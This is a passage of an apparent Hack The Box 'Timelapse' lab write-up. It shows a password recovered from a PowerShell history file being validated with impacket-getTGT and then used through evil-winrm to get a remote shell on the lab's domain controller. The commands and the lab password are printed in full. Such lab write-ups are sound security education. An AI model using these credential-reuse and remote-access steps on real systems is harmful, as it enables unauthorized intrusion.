legacyy
A CLEARTEXT credential for the svc_deploy account has been disclosed in the PowerShell history file of the legacyy user
While it is unclear if the svc_deploy account is also part of the Remote Management Users group, other validation methods can be used.
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-getTGT timelapse.htb/svc_deploy@dc01.timelapse.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: E3R$Q62^12p7PLlC%KWaxuaV
[*] Saving ticket in svc_deploy@dc01.timelapse.htb.ccacheValidation complete by generating a TGT
Lateral Movement made to the svc_deploy account
WinRM
As discovered through ldapdomanindump and bloodhound session, the svc_deploy account is part of the Remote Management Users group
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ evil-winrm -i dc01.timelapse.htb -S -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::245
IPv6 Address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
Link-local IPv6 Address . . . . . : fe80::cc93:dbe2:8401:964%13
IPv4 Address. . . . . . . . . . . : 10.10.11.152
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
10.10.10.2PowerShell session established